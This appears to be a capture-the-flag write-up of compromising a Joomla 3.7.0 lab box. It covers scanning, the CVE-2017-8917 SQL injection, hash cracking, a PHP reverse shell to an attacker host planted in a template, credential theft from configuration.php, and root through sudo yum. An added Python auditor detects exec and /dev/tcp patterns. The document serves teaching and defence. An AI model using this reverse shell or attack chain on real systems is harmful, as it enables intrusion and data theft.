[Enumeration]
1. Port scan
```sh
nmap -Pn <ip>
```
There are 3 open ports: 22, 80, and 3306.
![Image for post](https://miro.medium.com/max/60/1*BbkGRbay55pFgedlTrbyJQ.png?q=20)
2. OS and service scan
```sh
nmap -A -p 22,80,3306 <ip>
```
This machine is CentOS.
![Image for post](https://miro.medium.com/max/60/1*ae8kEspoaIUNu6ao1sZ49Q.png?q=20)
3. Vuln scan
```sh
nmap --script vuln -p 22,80,3306 <ip>
```
![Image for post](https://miro.medium.com/max/60/1*lPEaVCliz99wwSNnqyowWQ.png?q=20)
This machine runs Joomla 3.7.0, which has an SQLi vulnerability.
![Image for post](https://miro.medium.com/max/60/1*0ExYHx6rPyHm0K7atIDzhA.png?q=20)
4. Access HTTP site.
There’s news of Spiderman robbing the bank.
![Image for post](https://miro.medium.com/max/60/1*U_Zq9ooOGr464PJu8F5HvA.png?q=20)
View page source, nothing.
![Image for post](https://miro.medium.com/max/60/1*HYoExu83DNrZSGH2eEk52Q.png?q=20)
From step 3, let’s access /administrator.
![Image for post](https://miro.medium.com/max/60/1*ziWFGh4B52dRKu5yznGCoA.png?q=20)
5. Search for default credentials.
I only have “admin” without any password.
![Image for post](https://miro.medium.com/max/60/1*gd8DofQ0oECP0h9d68SAfw.png?q=20)
6. Search for exploits
```sh
searchsploit joomla 3.7.0
```
There are SQLi and XSS entries.
![Image for post](https://miro.medium.com/max/60/1*CrNEHGUuRokzT6cU9jn-rw.png?q=20)
Read XSS. It’s CVE-2017-8917 with sqlmap usage, but I will search for a Python script instead.
![Image for post](https://miro.medium.com/max/60/1*3oi3sNa7Wn_rg3VaVmewPw.png?q=20)
[Exploitation]
1. After searching with Google, I came across this:
stefanlucas/Exploit-Joomla (github.com): CVE-2017-8917 – SQL injection Vulnerability Exploit in Joomla 3.7.0
```sh
python joomblah.py http://<ip>
```
Now I have a username, jonah, and a password hash.
![Image for post](https://miro.medium.com/max/60/1*xy5rKyDivOFQcdxzlmXZjw.png?q=20)
2. Cracking the password
Using the example hashes guide, example_hashes [hashcat wiki] (hashcat.net), the hash may be bcrypt.
![Image for post](https://miro.medium.com/max/60/1*Zu-JI3Ua_lLwHm2iolwDkQ.png?q=20)
I will use hashcat on Windows for better performance.
Save the hash in a text file as daily-bugle.txt.
![Image for post](https://miro.medium.com/max/60/1*cbJy2BloL_kdxCoM_Meyxw.png?q=20)
Use hashcat
```sh
hashcat.exe -m 3200 daily-bugle.txt rockyou.txt
```
Now I have a password for Joomla.
![Image for post](https://miro.medium.com/max/60/1*52qccZJ0w63NRJuxe6LEvw.png?q=20)
3. Login to Joomla
![Image for post](https://miro.medium.com/max/60/1*tLIflVr9maVOUkCbN0h3DQ.png?q=20)
Now I have a dashboard.
![Image for post](https://miro.medium.com/max/60/1*hLFaMf2A8ClNfqubpytThQ.png?q=20)
4. Reverse shell
I will use this guide to get a reverse shell: Joomla: Reverse Shell (laptrinhx.com).
Click “Templates”.
![Image for post](https://miro.medium.com/max/60/1*7jEX2P-grtOvIAgCzet4OA.png?q=20)
Select the first template.
![Image for post](https://miro.medium.com/max/60/1*hblJrT4vprE11lMEgiSIGQ.png?q=20)
Select index.php.
![Image for post](https://miro.medium.com/max/60/1*vrEqrRkQBsBTShwvk2Y77Q.png?q=20)
Prepare a listener on port 1234
```sh
nc -lvp 1234
```
![Image for post](https://miro.medium.com/max/60/1*qWX5_NVmHscLWtt9hG2kiQ.png?q=20)
Prepare the reverse shell
```php
exec("/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'");
```
Inject the reverse shell into index.php.
![Image for post](https://miro.medium.com/max/60/1*ZGrnJkBDlXVMY9W-PYqfKw.png?q=20)
Click Template review
![Image for post](https://miro.medium.com/max/60/1*5cf03XrUw_khH4Cb8dmvlQ.png?q=20)
Now I have a shell.
![Image for post](https://miro.medium.com/max/60/1*2ZvnZP0s3lTWKxJiXSiyCQ.png?q=20)
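From the defender’s side, the template edit above is a file-integrity event: a PHP file inside the templates directory changes and starts containing a command-execution call. The following added example (not from the write-up, not Joomla’s own code) baselines a constructed templates directory, then flags files whose SHA-256 digest changed or that contain `exec`-style calls or `/dev/tcp` redirections; the `protostar` directory name, the file contents and the pattern list are constructed for the demo.

```python
"""Integrity and content audit for CMS template PHP files (added example).

All paths and file contents below are constructed for the demo; the
SUSPICIOUS pattern list is illustrative, not an exhaustive webshell signature set.
"""
import hashlib
import os
import re
import tempfile

# Calls a Joomla template index.php never needs, plus the bash /dev/tcp redirection.
SUSPICIOUS = re.compile(r"\b(exec|shell_exec|system|passthru|popen)\s*\(|/dev/tcp/")


def sha256_file(path):
    with open(path, "rb") as fh:
        return hashlib.sha256(fh.read()).hexdigest()


def baseline(root):
    """Map each .php file (relative path) under root to its digest; run on a known-good install."""
    return {os.path.relpath(os.path.join(d, f), root): sha256_file(os.path.join(d, f))
            for d, _, files in os.walk(root) for f in files if f.endswith(".php")}


def audit(root, known_good):
    """Return (relative path, reasons) for new, modified, or suspicious PHP files under root."""
    findings = []
    for rel, digest in sorted(baseline(root).items()):
        reasons = []
        if rel not in known_good:
            reasons.append("new file")
        elif known_good[rel] != digest:
            reasons.append("digest changed")
        with open(os.path.join(root, rel), errors="replace") as fh:
            if SUSPICIOUS.search(fh.read()):
                reasons.append("suspicious call")
        if reasons:
            findings.append((rel, reasons))
    return findings


def demo():
    """Constructed scenario: baseline a clean template, then tamper with its index.php."""
    root = tempfile.mkdtemp()
    tpl = os.path.join(root, "protostar")  # constructed template name
    os.mkdir(tpl)
    index = os.path.join(tpl, "index.php")
    with open(index, "w") as fh:
        fh.write("<?php defined('_JEXEC') or die; echo 'template'; ?>\n")
    good = baseline(root)
    with open(index, "a") as fh:  # the edit made through the template editor
        fh.write("<?php exec(\"/bin/bash -c 'bash -i >& /dev/tcp/<attacker ip>/1234 0>&1'\"); ?>\n")
    return audit(root, good)  # -> [('protostar/index.php', ['digest changed', 'suspicious call'])]
```

In production the baseline would be stored off-host and `audit` run from cron or a FIM agent, since a web-server user that can edit templates can also edit a baseline kept beside them.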
[Privilege Escalation]
1. Verify user
```sh
id
```
I’m apache.
![Image for post](https://miro.medium.com/max/60/1*BGsRbdFoYyD5l9GhTZSQcg.png?q=20)
2. Most CMSs keep credentials in a config file. Let’s grab them in case I need them somewhere else.
```sh
ls
cat configuration.php
```
I have a new credential. I can use it somewhere.
![Image for post](https://miro.medium.com/max/60/1*P3btKdVbBaTcfnwnMur6JA.png?q=20)
3. Verify users
```sh
cat /etc/passwd
```
This machine has 2 users: root and jjameson.
![Image for post](https://miro.medium.com/max/60/1*JHFLggBB_eTk-Pj3qeAhwA.png?q=20)
4. Login as jjameson
Try to log in with the Joomla credential
```sh
su jjameson
```
Failed!!!
![Image for post](https://miro.medium.com/max/60/1*SZH-6B0u2G4OHD1dYQpQdQ.png?q=20)
Try to log in with the credential from the config file
```sh
su jjameson
id
```
Success!!!
![Image for post](https://miro.medium.com/max/60/1*DfWS8W8nxyANKaoMD32_Ww.png?q=20)
5. Verify sudo
There’s a yum command.
![Image for post](https://miro.medium.com/max/60/1*FJLHygdRYDZX9W-hJN_2DQ.png?q=20)
Following GTFOBins, there are 2 ways of exploiting it: yum | GTFOBins (gtfobins.github.io).
Let’s try the first set of commands.
![Image for post](https://miro.medium.com/max/60/1*z-WU7Z6iSKQ-g5x-RzfurA.png?q=20)
Failed!!!
![Image for post](https://miro.medium.com/max/60/1*vH9m5RugJsD73uYBtfLHxA.png?q=20)
Let’s try these instead.
![Image for post](https://miro.medium.com/max/60/1*klzw1Fnifvx_k1KjzWmrag.png?q=20)
![Image for post](https://miro.medium.com/max/60/1*uzzS4y_UG_cerzg9impzcg.png?q=20)
6. Read user.txt
Now I’m root. Let’s get the answers for this box.
```sh
cd /home/jjameson
ls
cat user.txt
```
![Image for post](https://miro.medium.com/max/60/1*vkaxPY3TwLchekFMvT7cEA.png?q=20)
```sh
cd /root
ls
cat root.txt
```
![Image for post](https://miro.medium.com/max/60/1*kHFsAImsa9hJG3HP41pFGA.png?q=20)